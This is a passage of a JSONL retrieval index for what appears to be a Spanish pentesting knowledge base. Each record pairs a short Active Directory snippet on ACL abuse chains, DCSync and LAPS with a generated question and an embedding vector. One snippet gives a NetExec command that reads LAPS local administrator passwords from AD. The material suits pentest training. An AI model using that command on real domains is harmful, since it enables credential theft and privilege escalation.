-0.09065, -0.1025, -0.00543, -0.10619, 0.02971, 0.02617, -0.06802, -0.05751, -0.03304, 0.04242, -0.05964, 0.01321, 0.14123, 0.02585, -0.04885, 0.0359, 0.00483, 0.03888, -0.12409, 0.14282, 0.02032, 0.18419, 0.04794, -0.09449, -0.05735, 0.03501, 0.04953, -0.03835, -0.12041, -0.11526, -0.06681, 0.06602, -0.06344, 0.00912, -0.02367, -0.04268, -0.0874, -0.00383, -0.02802, 0.07515, 0.10225, 0.01898, 0.01091, 0.12712, -0.01035, -0.01308, -0.03816, -0.01821, -0.0368, -0.09517, -0.07603, 0.00293, -0.03492, 0.02297, 0.01561, -0.02796, -0.02927, 0.04391, -0.099, -0.06313, 0.10366, -0.05104, 0.01266, -0.13409, -0.02647, 0.02694, -0.02603, 0.04746, -0.03909, 0.1167, -0.00691, 0.02575, -0.00142, -0.01682, -0.04945, 0.08323, -0.04525, -0.01665, -0.00477, -0.0078, 0.1121, -0.06975, 0.00889, 0.00201, 0.02272, 0.01665, -0.07638, 0.08009, 0.02275, -0.01997, 0.00523, -0.06125, -0.01082, -0.08902, 0.06908, 0.02968, -0.04249, 0.01617, 0.05233, 0.04495, -0.09496, 0.04462, 0.01841, 0.04703, -0.00753, 0.07163, 0.06174, 0.03185, 0.0177, -0.04368, -0.02487, -0.02976, 0.045, 0.02751, -0.00037, -0.02593, 0.015, -0.0369, 0.0343, 0.01798, 0.03971, 0.07759, -0.02755, 0.05456, 0.06979, 0.07191, 0.00631, -0.05195, 0.05385, -0.03267, -0.04559, -0.00785, 0.01662, 0.02059, -0.00707, -0.00576, -0.06025, 0.06812, 0.00194, -0.01647, 0.04366, -0.05766, 0.03295, 0.0373, -0.00286, 0.04846, -0.03268, -0.00991, 0.0198, -0.01496, 0.06779, -0.01289, 0.03287, -0.04415, -0.04867, -0.01602, -0.02232, 0.06556, 0.07066, -0.0604, -0.08394, -0.02029, -0.04584, 0.03127, -0.05886, -0.01088, -0.00494, 0.02701, 0.02695, 0.03237, -0.02149, -0.01917]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "ΒΏhay alguna herramienta que identifique el riesgo de usar DCSync?", "v": [-0.11924, 0.06487, -0.17726, -0.10245, 0.12092, -0.17729, -0.2098, -0.01743, -0.06671, 0.07004, -0.00339, -0.14373, -0.10713, -0.14075, -0.01486, 0.02277, 0.0108, 0.0458, -0.15562, -0.15475, 0.0104, -0.15636, -0.06207, -0.01661, 0.02435, -0.01209, -0.04501, 0.00589, -0.16912, -0.00855, 0.07368, 0.02454, 0.18034, 0.00682, -0.08176, -0.08393, -0.02801, 0.03488, 0.12182, 0.00399, -0.0185, -0.05159, -0.17519, 0.02048, 0.03803, 0.0428, -0.0371, 0.01412, 0.02143, 0.00178, -0.08103, -0.08774, -0.12636, 0.06742, 0.00238, -0.05512, 0.05651, 0.05743, 0.01641, -0.12757, -0.07201, 0.02852, -0.03535, -0.03163, -0.07164, -0.02117, -0.06899, -0.06418, -0.12584, 0.09114, -0.03904, -0.01457, 0.05464, 0.0051, 0.12309, 0.00351, 0.0582, -0.04174, 0.0741, -0.0258, 0.06719, -0.02025, 0.01818, -0.02614, -0.11575, -0.06073, 0.16651, 0.00264, 0.03893, -0.07765, 0.08097, 0.06339, -0.08235, 0.02156, 0.02338, -0.03705, 0.05625, -0.01182, 0.033, -0.00042, 0.15963, -0.06019, 0.03435, 0.07889, -0.08046, -0.01538, 0.02617, -0.06779, -0.03578, -0.02357, -0.01563, 0.09435, -0.03818, -0.01763, -0.0376, 0.10564, 0.02988, -0.06819, 0.01414, -0.11851, -0.01235, 0.03226, -0.08041, -0.06728, 0.04327, -0.0156, -0.02122, 0.09896, -0.06976, -0.02593, -0.0654, -0.09409, -0.07675, -0.04184, 0.00232, 0.00912, 0.00969, -0.09307, -0.02118, -0.00991, 0.06926, 0.06065, -0.00629, -0.03451, 0.04687, 0.04033, 0.02359, -0.03234, -0.07178, 0.04722, 0.00492, -0.00084, 0.00899, 0.01407, -0.03953, 0.01853, -0.00938, -0.02231, -0.06082, -0.02665, -0.05226, 0.01043, 0.07462, -0.00992, 0.00597, -0.07641, 0.0825, -0.03716, 0.0497, 0.08915, 0.05569, 0.0241, 0.06862, -0.03094, -0.0067, -0.05548, -0.04383, -0.01805, 0.02823, -0.04415, 0.02982, 0.0037, -0.00872, -0.00433, 0.03797, -0.02312, 0.02634, 0.00136, -0.00579, 0.09944, -0.03491, 0.02016, 0.00811, -0.03533, 0.02297, 0.02366, 0.01887, -0.04495, 0.07952, -0.02133, -0.04505, -0.01296, -0.02203, -0.02596, 0.14109, 0.03539, -0.04206, 0.03314, 0.0064, 0.06848, 0.09621, -0.02156, 0.08624, -0.01257, 0.00244, -0.01043, 0.00262, 0.04212, -0.0074, -0.00649, -0.00634, 0.00384, 0.01935, 0.01576, 0.0013, -0.00174, 0.00647, -0.01548, 0.01726, 0.04199, 0.02811, 0.04301, -0.04545, -0.02728, 0.04994, 0.00521, 0.04741, -0.04239, 0.01825, -0.05457, 0.00451, 0.05471, -0.02426, -0.01564, -0.01162, -0.01032, -0.02143, 0.02792, -0.03945, -0.07258, 0.02859, -0.01624, 0.04613, -0.00455, -0.01483, -0.02352]} +{"tipo": "pregunta", "herramienta": "ACL abuses", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/ACL abuses.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Encadenado\nUna arista lleva a otra β†’ BloodHound calcula el **camino** hasta Domain Admins β†’ puede acabar en DCSync.\n\nRelacionado: BloodHound Β· LAPS Β· OSCP MOC", "indexar": "cual es una alternativa libre a BloodHound para mapear conexiones en Active Directory?", "v": [-0.05537, 0.05981, 0.07597, -0.07286, -0.13796, 0.02587, -0.04893, -0.01422, -0.10605, 0.05611, -0.00882, -0.23388, -0.0502, 0.03955, 0.03285, -0.02307, 0.06467, -0.0673, 0.05131, -0.12212, -0.04181, 0.08887, -0.19043, 0.02176, -0.00977, 0.02182, 0.03472, 0.07433, -0.06585, -0.06373, -0.02411, -0.0841, 0.07145, 0.08988, -0.04722, -0.05443, 0.03464, 0.08585, 0.13747, -0.00348, -0.0794, -0.05682, -0.06434, 0.02562, 0.03732, 0.05866, -0.02872, -0.00167, 0.0859, 0.14027, -0.06853, 0.03437, -0.19243, -0.0674, 0.06248, 0.02047, 0.024, -0.15159, -0.05356, -0.06542, -0.06943, -0.06082, -0.00241, -0.06543, -0.02273, -0.05533, 0.07012, -0.07179, -0.11041, 0.17595, 0.03234, 0.08167, 0.03925, 0.10898, -0.03787, -0.0398, 0.0677, -0.06271, -0.02248, 0.12676, 0.10691, -0.01881, 0.00322, 0.00444, -0.06113, -0.06194, 0.0708, -0.09768, 0.07266, 0.05975, 0.08976, 0.02284, -0.05068, 0.17633, -0.03209, -0.09125, -0.00593, 0.06093, 0.02842, 0.02525, 0.05423, 0.08087, -0.14521, 0.107, 0.02867, -0.0468, -0.06865, 0.11334, -0.11186, 0.06914, 0.02697, 0.03639, -0.00526, 0.02146, 0.02865, -0.03227, 0.03702, 0.05081, 0.05205, 0.01451, -0.05533, -0.03762, 0.0292, 0.01929, -0.04716, 0.08007, -0.03867, 0.01752, 0.00153, 0.06999, 0.05065, 0.0569, -0.0312, -0.20346, -0.09842, 0.01643, 0.02916, -0.02789, 0.07937, -0.07325, -0.08722, -0.03807, 0.06438, 0.04871, -0.04015, -0.00183, 0.03075, 0.0149, 0.00568, 0.03436, -0.05304, 0.04631, -0.03446, 0.08218, 0.03359, 0.09228, -0.01776, 0.01665, -0.07682, 0.06768, 0.00648, -0.03561, -0.03483, -0.02351, -0.06377, 0.06293, -0.08896, 0.02144, -0.04591, 0.03571, 0.01763, 0.07692, 0.05979, -0.07325, -0.03573, -0.04274, 0.018, -0.09095, 0.0433, 0.0331, 0.05372, -0.02541, -0.06608, 0.01376, 0.02963, 0.02084, 0.01688, 0.00901, 0.03152, -0.01511, -0.026, 0.09551, 0.05794, -0.03691, -0.03391, -0.04045, 0.10701, -0.07609, -0.03814, -0.06585, -0.00221, 0.013, -0.02997, 0.02975, -0.00127, 0.04048, -0.01011, 0.07939, 0.00864, 0.03919, -0.02583, -0.00513, 0.07838, 0.02191, -0.02416, 0.03789, 0.01074, -0.01573, -0.04927, 0.02269, 0.01637, 0.0139, -0.03208, 0.02764, 0.03145, 0.02472, 0.00375, -0.01989, 0.00753, -0.02339, 0.00979, 0.00361, -0.01395, 0.01534, -0.04061, 0.03948, 0.01974, 0.00491, 0.0278, -0.00489, 0.06573, 0.04786, -0.01635, 0.01559, -0.05404, -0.02743, -0.02963, -0.01154, -0.048, -0.04455, 0.0073, -0.01915, 0.05103, 0.02639, 0.01072, 0.02181]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "que programa hay para rotar la contraseΓ±a del administrador local y guardarla en Active Directory?", "v": [-0.01566, 0.05524, -0.04311, -0.32608, -0.04721, -0.07664, 0.05552, -0.04095, -0.10604, 0.02368, 0.04806, -0.11731, -0.00046, -0.07054, 0.07187, 0.00054, 0.14977, -0.1095, 0.00298, 0.08367, -0.00298, 0.13785, 0.04827, 0.09188, 0.00389, 0.01686, 0.05241, -0.08107, -0.0211, -0.03383, 0.06469, -0.04299, 0.01443, -0.02427, 0.04448, 0.07135, 0.089, 0.00189, 0.04945, 0.07038, -0.02771, 0.08043, -0.07732, 0.1378, 0.01737, 0.11961, 0.08637, -0.10169, 0.12475, 0.04842, -0.1321, -0.10087, 0.03053, -0.03906, 0.10107, -0.03079, -0.02016, -0.05899, 0.0187, -0.05526, -0.11815, -0.00193, -0.02107, 0.06533, -0.10788, -0.05216, 0.15374, -0.03585, -0.14177, 0.04878, -0.02419, -0.0191, 0.00054, 0.12434, 0.00795, 0.0219, 0.08067, 0.03515, -0.00175, 0.07767, -0.05698, -0.02559, 0.06481, 0.04843, -0.11486, -0.10765, 0.01968, -0.10336, 0.04866, -0.03119, 0.06717, -0.03691, -0.04264, 0.08871, -0.00715, -0.06762, 0.11682, 0.09735, -0.01985, 0.00678, 0.00378, -0.04836, 0.02189, 0.17332, 0.01633, 0.08879, -0.01819, 0.0761, -0.00313, 0.04428, 0.02491, -0.03383, -0.04819, -0.04734, 0.00676, 0.05059, -0.04029, -0.07316, 0.04858, 0.04436, -0.09345, -0.05986, -0.00562, 0.04516, 0.09307, 0.04923, 0.02052, 0.094, -0.06955, 0.04563, 0.01382, -0.00456, 0.00348, -0.06914, -0.09212, -0.00617, -0.06615, -0.054, -0.01633, -0.05892, -0.10539, -0.01612, 0.05082, 0.03245, 0.07519, -0.0032, 0.02465, 0.01747, -0.06047, 0.07039, 0.02641, 0.01938, -0.0005, 0.03385, -0.04209, 0.06931, 0.04254, -0.06288, -0.0214, 0.07422, -0.01817, -0.03153, -0.01206, -0.01397, -0.07434, -0.09302, -0.03468, 0.02124, 0.07484, 0.05343, -0.03399, 0.09681, 0.02402, -0.08082, -0.04487, -0.01848, 0.03926, -0.08702, 0.04525, -0.04802, -0.0018, 0.01697, 0.04949, 0.09452, -0.04118, -0.07655, 0.05171, 0.02211, -0.06086, -0.00564, 0.05465, -0.00477, -0.00531, 0.02868, -0.00646, -0.05329, -0.01711, -0.03236, -0.01637, -0.04577, -0.01241, -0.0104, -0.00314, -0.02061, 0.03005, 0.02684, -0.10615, 0.03201, 0.03881, 0.0482, -0.00875, -0.02016, 0.05852, 0.04483, -0.07745, -0.06191, 0.016, 0.07046, -0.02107, 0.00075, 0.0315, 0.01676, 0.02984, 0.02777, 0.03038, -0.09555, -0.01093, 0.02894, 0.03167, 0.03594, -0.06135, -0.0054, -0.00281, -0.00155, 0.08237, -0.0183, 0.00469, -0.05974, 0.00221, -0.06186, -0.02645, 0.06927, 0.02878, -0.05881, -0.12329, 0.01632, -0.0434, 0.05383, 0.00343, 0.00653, -8e-05, -0.03703, 0.00616, -0.03824, -0.02576, 0.00729]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "con que puedo obtener la contraseΓ±a del equipo desde Active Directory si se guarda allΓ­?", "v": [-0.05617, 0.14404, -0.1166, -0.11261, -0.06656, -0.02382, -0.03315, -0.00015, -0.03859, -0.03245, 0.02721, -0.02837, -0.07914, -0.05279, 0.08838, 0.07417, 0.1799, 0.09191, 0.00663, 0.05034, 0.05609, 0.05574, 0.02899, -0.00324, 0.10747, 0.00635, 0.06396, -0.00249, -0.09623, -0.076, 0.06594, 0.03387, 0.00047, -0.00061, 0.11067, 0.021, -0.00783, 0.0909, 0.07249, 0.06223, -0.05998, 0.04351, -0.12317, 0.0884, 0.04917, 0.0919, 0.04364, -0.02767, 0.09206, 0.03849, -0.14114, -0.08312, -0.02442, -0.16205, -0.01064, -0.08087, 0.12239, -0.01236, 0.02957, -0.07852, -0.1433, -0.04203, -0.03085, 0.0834, -0.05131, -0.04009, 0.0776, -0.01302, -0.09857, -0.00054, -0.05102, -0.03794, -0.10361, 0.0922, -0.04216, -0.01695, 0.09049, 0.03245, 0.00717, 0.09279, -0.0249, 0.0455, 0.03701, -0.03811, -0.10852, -0.12422, 0.06171, -0.00865, 0.06907, -0.136, 0.11813, -0.0169, -0.13299, 0.05707, -0.09326, -0.00579, 0.00738, 0.05319, 0.02757, -0.02643, -0.02732, 0.03308, -0.02618, 0.14398, 0.05893, 0.06442, 0.00711, 0.05327, -0.00628, -0.02725, 0.06878, -0.06603, -0.04291, -0.07012, 0.03654, 0.0396, -0.08362, -0.13156, 0.06523, 0.08574, -0.0819, -0.09643, -0.01817, 0.01405, 0.05422, -0.02815, -0.00468, 0.03961, -0.00753, 0.01931, -0.03235, 0.07157, -0.00485, -0.05599, -0.0721, 0.0281, -0.08196, -0.05723, -0.07683, -0.06686, -0.03433, -0.03569, 0.08057, -0.02791, 0.03985, -0.00061, 0.00049, -0.01198, -0.07804, 0.03848, -0.03928, 0.0383, -0.02072, 0.07323, 0.01691, 0.15034, 0.02784, -0.09508, -0.01964, 0.08291, -0.05926, -0.03157, -0.03508, 0.04379, -0.08154, -0.07811, -0.05085, -0.03617, 0.08196, 0.06446, -0.08235, 0.04586, -0.00583, -0.12606, 0.00186, -0.02592, 0.03092, -0.03987, 0.05187, -0.05768, -0.02512, -0.01496, -0.05983, 0.00481, -0.00941, -0.05639, 0.0665, -0.03355, -0.03409, -0.00175, 0.01685, 0.04346, 0.02327, 0.02344, -0.07949, -0.06326, -0.03123, -0.05076, 0.01661, -0.07745, 0.02359, 0.05783, 0.0198, -0.01078, 0.04404, 0.00092, -0.12844, 0.05836, -0.00312, 0.02923, 0.03102, -0.0025, 0.05675, -0.01136, -0.10367, -0.07181, 0.01234, 0.02508, -0.09149, 0.0303, 0.05805, 0.07234, 0.07218, 0.03742, 0.01036, -0.05606, -0.05392, 0.07544, 0.02019, 0.03415, -0.04812, 0.05107, 0.00737, 0.00206, 0.09117, 0.0505, -0.05224, -0.07093, -0.04787, -0.01294, -0.02536, 0.04527, -0.00907, -0.06308, -0.07931, -0.04034, -0.05681, 0.04424, 0.02164, -0.053, -0.01899, 0.00632, 0.03554, -0.05037, -0.02013, -0.04828]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# LAPS\n\n> Local Administrator Password Solution: rota la pass del admin local y la guarda en un atributo del objeto-equipo en AD. Si tu usuario **puede leer ese atributo**, tienes el admin local. Camino de Active Directory.", "indexar": "cual es una herramienta para ver los atributos del objeto-equipo de Active Directory y leer contraseΓ±as?", "v": [0.05824, 0.03199, -0.06316, -0.26176, 0.0374, -0.05297, -0.01255, -0.02559, -0.04261, -0.01437, -0.01788, -0.09593, -0.11388, -0.04142, 0.14034, 0.05737, 0.23032, -0.1484, -0.05668, 0.03333, 0.03933, 0.00547, -0.1405, 0.04336, -0.04834, 0.01812, 0.08188, 0.06231, -0.11105, 0.03514, -0.03842, 0.05659, 0.06437, -0.07094, -0.00454, -0.0618, -0.07348, 0.03156, 0.00817, 0.17041, 0.00268, 0.04086, -0.16586, 0.15226, 0.07206, 0.09956, 0.0307, 0.06759, 0.0095, 0.04372, 0.00103, -0.06079, -0.14015, -0.09141, 0.01008, -0.12295, 0.18777, -0.02519, 0.05153, -0.13291, -0.15096, -0.01379, -0.10052, -0.01952, -0.09197, -0.11715, -0.00126, -0.06741, -0.15323, -0.02294, 0.06149, -0.0199, 0.00497, 0.0785, 0.01761, 0.0533, 0.08132, 0.02686, 0.00148, 0.05824, 0.01602, 0.01838, -0.09664, -0.03522, -0.09221, -0.10969, 0.11616, -0.00268, 0.08274, -0.1098, 0.04035, 0.09116, -0.0798, -0.00724, -0.06646, 0.03067, 0.0503, 0.01041, 0.02022, 0.02172, 0.04957, 0.00904, -0.04286, 0.15137, 0.02149, 0.064, -0.0338, 0.0836, -0.06856, -0.04359, 0.08883, -0.05601, -0.01824, 0.00696, 0.11509, 0.03693, -0.08784, -0.06804, 0.03597, 0.01131, -0.01974, -0.01955, -0.00764, -0.01066, 0.01794, -0.01244, -0.03646, 0.01838, 0.01489, -0.02388, -0.00021, 0.05218, 6e-05, -0.00458, -0.09008, 0.00562, 0.06917, -0.08382, -0.04601, -0.07021, 0.00142, -0.02268, 0.02924, 0.00773, 0.054, 0.00036, 0.03662, -0.00236, -0.06148, 0.02702, 0.00772, 0.00802, 0.05089, 0.03544, -0.03306, 0.06684, -0.01865, 0.00178, -0.07598, 0.05867, -0.02116, -0.02492, 0.02216, 0.01586, -0.03083, -0.08438, 0.00619, 0.01405, 0.09459, 0.04472, 0.00219, -0.00944, 0.02325, -0.03048, -0.0251, -0.03836, 0.00149, -0.04442, 0.00621, -0.0938, -0.00258, -0.00824, -0.04967, 0.01345, 0.05034, -0.05564, 0.05819, -0.00955, -0.03544, -0.00241, -0.01122, 0.03107, 0.02298, -0.05126, -0.00717, 0.01256, -0.03677, -0.07306, 0.02203, -0.04561, 0.02349, 0.0175, -0.01293, -0.04887, 0.04829, 0.03289, -0.03548, -0.04481, -0.01823, 0.0182, 0.03984, 0.00713, 0.07258, -0.01662, -0.07049, -0.03663, -0.03515, 0.03164, -0.04689, 0.00216, 0.03591, 0.03681, 0.10586, -0.00708, 0.04241, -0.00289, -0.00749, 0.08238, 0.02925, -0.01202, 0.0068, -0.0197, 0.02305, -0.0221, 0.06444, 0.01485, 0.00769, -0.0429, -0.03617, -0.01476, -0.01078, 0.04417, 0.00764, -0.04013, -0.06825, -0.01332, -0.0166, 0.03183, -0.0575, -0.10308, -0.02462, 0.00224, 0.06725, -0.0681, -0.0094, -0.05967]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "indexar": "QuΓ© programa puedo usar para gestionar la contraseΓ±a de administrador local en cada computadora?", "v": [0.07033, 0.10245, -0.04417, -0.26125, -0.00093, -0.16306, 0.04772, -0.05062, -0.11577, -0.09696, -0.06427, -0.0589, -0.02548, -0.02873, -0.00555, 0.00251, 0.14871, -0.0888, 0.06852, 0.05878, 0.0337, -0.00722, 0.04391, 0.04397, -0.01467, 0.01414, 0.10427, -0.08322, -0.04477, -0.07447, 0.01052, -0.00346, 0.08799, -0.06916, 0.03524, 0.07116, 0.01547, 0.02211, 0.05014, 0.08539, 0.05583, 0.08167, -0.10042, 0.07658, 0.14927, 0.03148, 0.07395, -0.11137, 0.04314, 0.01421, -0.14243, -0.08025, -0.0411, -0.07278, 0.07159, -0.05674, 0.07315, -0.13203, 0.08714, -0.03564, -0.10614, 0.08056, -0.02745, 0.04783, -0.10072, 0.00615, 0.09657, -0.03364, -0.09953, 0.09568, -0.03421, 0.04767, 0.00958, -0.01501, 0.0377, 0.05881, 0.02037, 0.00866, 0.14014, -0.01207, -0.05783, -0.00196, -0.01299, 0.00807, -0.15798, -0.12485, 0.03263, -0.08083, 0.04383, -0.0255, 0.02543, -0.04842, -0.01184, 0.00238, 0.0868, -0.02904, 0.10901, 0.05937, -0.08023, 0.04265, 0.06094, -0.01623, -0.0523, 0.19569, -0.03515, 0.08396, 0.04273, -0.0363, 0.00776, -0.0824, 0.05382, -0.01737, -0.10526, -0.00412, -0.09751, 0.03789, 0.01156, -0.04201, 0.01782, 0.00049, -0.08601, -0.00933, 0.04084, 0.03008, 0.11389, 0.02575, 0.04864, 0.10808, -0.08747, -0.01479, -0.00785, -0.08764, -0.01356, -0.03933, -0.10896, 0.02668, -0.06979, -0.09092, -0.03063, -0.06268, -0.05769, 0.07242, -0.01015, -0.04395, 0.08837, 0.04494, 0.0277, -0.06227, -0.07432, 0.0487, 0.0709, -0.02821, -0.02752, 0.06086, -0.0532, 0.05247, 0.05111, -0.00539, -0.07898, 0.06187, -0.06746, -0.01542, 0.02077, 0.04302, -0.03574, -0.06952, -0.01063, 0.04546, 0.05492, 0.05426, -0.05718, 0.09909, 0.02568, -0.01921, -0.00091, -0.02607, 0.01185, -0.07392, -0.01519, -0.02715, -0.0319, 0.06589, 0.03122, 0.03433, -0.07729, -0.03301, -0.01252, 0.05485, -0.0541, 0.01045, 0.02183, 0.00775, 0.01559, 0.02027, 0.05038, -0.02828, -0.02806, -0.01337, -0.00877, -0.0403, -0.04959, -0.00151, -0.06168, -0.01195, 0.07689, 0.10668, -0.06726, -0.00781, 0.03655, 0.07947, -0.00461, -0.02021, 0.02466, 0.01921, -0.07535, -0.07937, 0.02343, 0.02534, -0.00393, -0.02811, 0.06082, 0.00607, 0.05694, 0.02676, 0.04223, -0.08811, 0.01026, 0.04517, 0.00953, 0.01289, -0.05637, 0.02325, -0.00879, 0.00189, 0.04815, -0.00883, 0.01217, -0.07072, -0.02806, -0.00672, -0.03684, 0.08149, 0.01669, -0.08546, -0.07968, 0.00351, -0.09041, 0.02395, -0.03552, -0.01209, -0.0265, -0.03493, 0.00988, -0.02523, -0.01006, 0.06639]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# o:\nnxc ldap IP -u usuario -p password -M laps\n```\n- El atributo es `ms-Mcs-AdmPwd` (LAPS v1).", "indexar": "Con quΓ© herramienta accedo a los atributos de seguridad de LAPS que se guardan en el registro del sistema?", "v": [-0.00877, 0.03109, -0.03116, -0.25627, 0.04767, -0.08964, -0.00087, -0.12869, -0.10228, 0.04754, -0.10352, -0.04059, -0.08513, -0.00862, 0.17264, 0.00973, 0.10317, -0.05971, -0.0697, 0.03713, 0.00667, -0.07689, -0.04865, -0.04214, -0.04645, -0.00945, 0.09346, -0.01776, -0.16384, 0.10445, -0.03927, 0.02427, 0.03558, -0.0256, -0.10306, -0.01393, 0.03989, 0.1081, -0.00897, 0.13152, 0.04114, 0.00504, 0.0064, 0.00464, 0.03736, -0.10477, 0.03488, 0.08839, 0.01407, -0.01193, -0.07157, -0.11314, -0.16924, -0.10979, 0.05455, -0.13734, 0.10617, 0.01002, 0.07183, -0.06051, -0.19792, 0.09606, -0.06406, 0.02428, -0.02331, -0.08874, -0.00666, -0.07531, -0.09845, -0.01223, 0.08025, 0.01188, 0.03534, -0.01222, 3e-05, -0.00188, 0.04627, 0.05095, 0.01962, 0.06495, -0.10141, 0.03945, -0.14254, -0.01653, -0.11402, -0.10775, 0.00824, -0.00883, -0.01685, -0.01073, 0.14718, 0.0682, 0.04786, 0.04925, 0.03616, 0.0085, 0.03179, -0.02624, -0.01168, 0.03884, 0.10602, -0.01996, -0.08167, 0.11662, 0.02657, 0.0231, -0.02, 0.0293, 0.05707, -0.07656, 0.04781, 0.06697, -0.05749, 0.01117, -0.01136, 0.03685, 0.00788, -0.06845, 0.03215, -0.03465, 0.05184, 0.06681, 0.01248, -0.09964, 0.09874, -0.01457, -0.0721, 0.08495, 0.02108, -0.03099, 0.0092, -0.09083, -0.08916, -0.01137, -0.02644, -0.01738, -0.1061, -0.02473, 0.00049, -0.04651, 0.00666, 0.04991, 0.04774, -0.09966, 0.06029, 0.02181, 0.04835, -0.05111, -0.09121, -0.02779, -0.00045, -0.02567, -0.05421, -0.02989, -0.07514, 0.1, 0.01312, -0.06564, -0.03069, -0.02522, -0.02247, -0.03595, 0.04794, 0.03233, 0.01971, -0.01593, 0.08661, -0.02113, 0.04033, -0.00078, 0.03221, 0.01739, 0.10393, -0.03711, -0.0097, -0.0259, -0.07056, -0.08587, 0.02465, -0.02636, -0.06299, 0.02498, 0.00581, 0.03843, 0.04941, -0.08447, -0.03206, -3e-05, 0.0036, 0.04353, 0.01978, 0.04231, 0.02152, -0.00198, -0.03943, -0.00126, -0.00977, -0.08808, 0.04047, -0.00771, -0.02226, -0.03006, 0.02874, -0.07348, 0.07063, 0.09649, -0.00512, 0.00591, 0.0558, 0.03767, 0.0451, 0.01099, 0.0647, -0.02186, -0.03621, 0.00863, -0.01862, 0.08048, -0.04614, -0.09287, 0.04127, 0.00938, 0.01906, 0.01872, -0.03957, -0.01609, -0.02234, 0.07859, 0.02491, -0.02338, 0.00015, -0.06908, -0.04138, 0.01278, 0.05346, -0.04709, 0.00175, -0.04133, -0.02833, -0.08817, 0.00716, 0.07507, 0.00435, -0.09107, -0.04859, -0.07065, -0.04894, -0.00743, 0.00042, -0.11242, -0.03961, -0.02169, 0.03097, -0.07027, -0.01998, -0.07375]} +{"tipo": "pregunta", "herramienta": "LAPS", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/LAPS.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## CΓ³mo saber quiΓ©n puede leerlo\nBloodHound muestra `ReadLAPSPassword` como arista β†’ relacionado con ACL abuses.", "indexar": "quΓ© herramienta sirve para ver quΓ© personas pueden acceder a los datos de la red", "v": [-0.12462, 0.16447, -0.08737, -0.15496, 0.09039, -0.06506, -0.06961, -0.07275, -0.0026, -0.07148, -0.16878, -0.19213, -0.02113, -0.14478, 0.10822, 0.02201, 0.09594, -0.0446, 0.03169, -0.04626, -0.00744, -0.04071, -0.06757, -0.02123, -0.11384, 0.03837, 0.12761, -0.01836, -0.13904, 0.13383, 0.02908, -0.04355, -0.07802, -0.01824, -0.10122, 0.08978, 0.00013, 0.10202, -0.05189, 0.00052, -0.0182, 0.03533, -0.05213, 0.00059, 0.06592, -0.00652, -0.13779, 0.07769, -0.02521, 0.08849, -0.10344, -0.05664, -0.14331, -0.08507, -0.03733, -0.08613, 0.08456, -0.09441, 0.03952, -0.01061, -0.14042, 0.04856, -0.04442, 0.02742, -0.05324, -0.04091, 0.02421, -0.00799, -0.03819, 0.09936, -0.01686, 0.02893, -0.00031, -0.00712, 0.00777, -0.01957, 0.0325, 0.04106, 0.01092, -0.02902, -0.00662, 0.05689, -0.12512, -0.02234, -0.00146, -0.03661, 0.15433, -0.01825, -0.00903, -0.10181, 0.09513, 0.10595, 0.06631, -0.01122, 0.06112, 0.0863, 0.00997, -0.07667, -0.01645, -0.01003, 0.05602, -0.01771, -0.12907, 0.04711, -0.02184, 0.03764, 0.01715, 0.0011, -0.11028, -0.06842, 0.03149, -0.03694, -0.05169, 0.02781, 0.06131, 0.01737, -0.01234, -0.05329, -0.02465, -0.01844, -0.0075, -0.03279, 0.00525, -0.05509, -0.01581, -0.06037, -0.02911, 0.09109, -0.03704, -0.03163, -0.03598, -0.04525, -0.1027, -0.04106, 0.05645, -0.02083, -0.05696, -0.18488, 0.02216, -0.06988, 0.03274, 0.03511, -0.11373, -0.09198, -0.04131, -0.04697, 0.04688, 0.03849, -0.04563, -0.02282, -0.0155, -0.0525, 0.00738, 0.00253, -0.0783, 0.02915, -0.00962, -0.01116, -0.09298, 0.05017, -0.05245, -0.04985, 0.0036, 0.06254, 0.03113, -0.07357, 0.06487, -0.00155, 0.10036, 0.09329, -0.00555, 0.04193, 0.04845, -0.08021, 0.0089, -0.10094, -0.11098, -0.0892, -0.03138, -0.09962, 0.0285, -0.05615, -0.00499, -0.02183, 0.0291, -0.06618, 0.01936, -0.09748, 0.00349, 0.04778, -0.05196, 0.06377, 0.03395, -0.05545, 0.05812, 0.01763, -0.05213, -0.01903, 0.05677, -0.02419, -0.03933, -0.00558, -0.00937, 0.02808, 0.02879, 0.09624, -0.01243, -0.04093, 0.01571, 0.04389, 0.02027, 0.00621, 0.03373, 0.00115, -0.05166, -0.00527, 0.05375, 0.02162, 0.03585, 0.00413, 0.05251, -0.00815, 0.0308, -0.00689, -0.05569, 0.03205, 0.06909, -0.04091, 0.0086, 0.0163, 0.04401, -0.03384, 0.00309, -0.01112, 0.03087, -0.05611, 0.02758, 0.0179, -0.05986, 